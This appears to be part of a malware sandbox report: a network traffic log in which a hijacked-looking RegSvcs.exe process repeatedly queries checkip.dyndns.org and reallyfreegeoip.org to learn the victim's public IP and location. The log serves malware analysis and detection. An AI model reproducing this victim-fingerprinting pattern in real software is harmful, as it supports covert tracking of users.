Jan 2, 2025 20:20:01.156280994 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:20:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d80210aa8966b71a29257945c689d27c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49820	158.101.44.242	80	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:20:01.966063023 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:20:08.155570030 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:20:08 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: feb741ad178a914780537352d107ae0a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49866	158.101.44.242	80	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:20:08.852072001 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 20:20:15.185223103 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:20:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ece30fa5696c934e3490b46725ae31ae Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49717	188.114.96.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:50 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:19:50 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:50 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160379 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FCyHJUhL2vRigCTR4muaSotPuJ5Tc%2Bv%2F5lyuLg6GtDoa9gzbm5q1PF4Qho0TcHrrWlzZ5mqH8kqhXPthllg9q9MG8Mfl0J%2BFpyEexekbwX%2BSVCNhROq%2F5hYHPpn57hdC7z9SJgnp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a5c0e7b6a4e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1658&rtt_var=686&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1761158&cwnd=212&unsent_bytes=0&cid=e5c7d26b6d871939&ts=370&x=0"
2025-01-02 19:19:50 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49724	188.114.96.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:51 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:19:51 UTC	862	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:51 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160380 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JpNQOZ1wvsM4fvE%2B0%2B6sKPxx95ea3VDWeSKnbBhMTWjck7orjks6rzEHOkRTaUdVbzcslMIJH%2FfUu7pHOULn3k1KqiA5ORihjQjmK%2Fj%2FqFfJZZ6820NQK7wkKeb3DOiT9g8va6pi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a61ba7b185d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=22210&min_rtt=1655&rtt_var=12914&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1764350&cwnd=238&unsent_bytes=0&cid=d4bfe5321e974a70&ts=162&x=0"
2025-01-02 19:19:51 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49737	188.114.96.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:52 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:19:52 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:52 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160381 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q3voC3EUtmxcAcgFA2lRgH%2BKWGKIbbNSOPy625zlHIXCgIBNMuejtRjtY5gVruduxBldIkv%2F3twkkxXtrSaGD5cStbxqm%2BJPsMEyWly%2FGlZ%2FJOyeuKYm3i0mwtHv6Uzsb4hcMnlI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a695c297279-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2054&min_rtt=1971&rtt_var=798&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1481481&cwnd=220&unsent_bytes=0&cid=ecdd9166eeb98a99&ts=157&x=0"
2025-01-02 19:19:52 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49745	188.114.96.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:53 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:19:53 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:53 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160382 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PYYmzFffsr%2BDfK%2BpvzKVDFQV367q%2BThQilgWlvn68aOOX9gmAO8dSvcxNfkoDX8aEKK0E0wLIr4eXw%2Ffs6yavDuRT9lWLB2rKrhHllfyxcbaNxt%2FwC43Kofq98WHdek3X0ZynQBS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a713c571902-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1581&rtt_var=812&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1188441&cwnd=219&unsent_bytes=0&cid=066af31bad1f1837&ts=150&x=0"
2025-01-02 19:19:53 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49759	188.114.96.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:55 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:19:55 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:55 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160384 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qgeEmxTJkTGD0t3RhoHDjMnGEKupUao6GL%2FjEewuDL39rJVl9fRRt1AXKvFvII70raRmNa0HPtBGi3HE9ez2%2FLUYGoUfab4in7VyyGVEzFXEI2PUCJSoLl5RFy0R17hGL2AUa5Qv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a79ad451819-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=16459&min_rtt=1689&rtt_var=9521&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1728833&cwnd=215&unsent_bytes=0&cid=89290bb1112ae4e8&ts=154&x=0"
2025-01-02 19:19:55 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49758	188.114.96.3	443	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:55 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:19:55 UTC	858	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:55 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160384 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EiDCSeTTlXiN9oS8MxHIvLveBm7GZivAKQSiWtaeNcxVMgx99L0uGC7ABnucibhSc2Ch3j5wLG3umxu6Mfl87mDQFcOVeznsOuwmz69D%2FeC7pL0mbD8sNmc3JzLn%2F6RqY0gV%2F3Ip"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a79baf87271-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=35905&min_rtt=2066&rtt_var=20942&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1413359&cwnd=225&unsent_bytes=0&cid=4f64ed6c28bb36ca&ts=189&x=0"
2025-01-02 19:19:55 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49766	188.114.96.3	443	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:55 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:19:55 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:55 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160385 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HVE9qIt0s1n7wlWYmUulNavon2sm7P%2Fg89%2F6nwE3o5LMWAb2tSTEkNo3uM5bg4q90ISzDthxnx9wLrS7cULfc%2BRO4FcuVWPVKzbYP6Hq0Lh60jHW2yWJngBJ%2FPHu6AlHRyljQ98%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a7e8d5a7cfc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=1961&rtt_var=898&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1117917&cwnd=223&unsent_bytes=0&cid=57390d5882e244e6&ts=144&x=0"
2025-01-02 19:19:55 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49771	188.114.96.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:56 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:19:56 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:56 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160385 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YTipxTU5NjpJDI%2BMcUund2AckepAzD%2FPBkxf8rLkqydBwYra%2BaiL1HLxzv%2BaMHnemzu%2B10r4qUaeIwTfU6p2vERmYw19nbv4v4rNY%2B141ZiBBV1fUxsb9jmGnvg64ReCAn2nYMdH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a8128144321-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1599&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1746411&cwnd=249&unsent_bytes=0&cid=c24823a728441fab&ts=162&x=0"
2025-01-02 19:19:56 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49780	188.114.96.3	443	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:57 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:19:57 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:57 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160386 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9yMLjvPO4O1aCwZW%2Fhv944%2Fau4zZ64hX3vgAtV88pSgg6YACxienAcw6TUBa85rC5q1RwLU7JWgGXQHhPqafxB4T8mIpbNwJoKPlM8Co6ZGbB2IyL%2FgXnEMF0mnqrUA8Ki0c%2BljA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a862a0843a9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1569&rtt_var=612&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1755862&cwnd=245&unsent_bytes=0&cid=45f842d315d99520&ts=158&x=0"
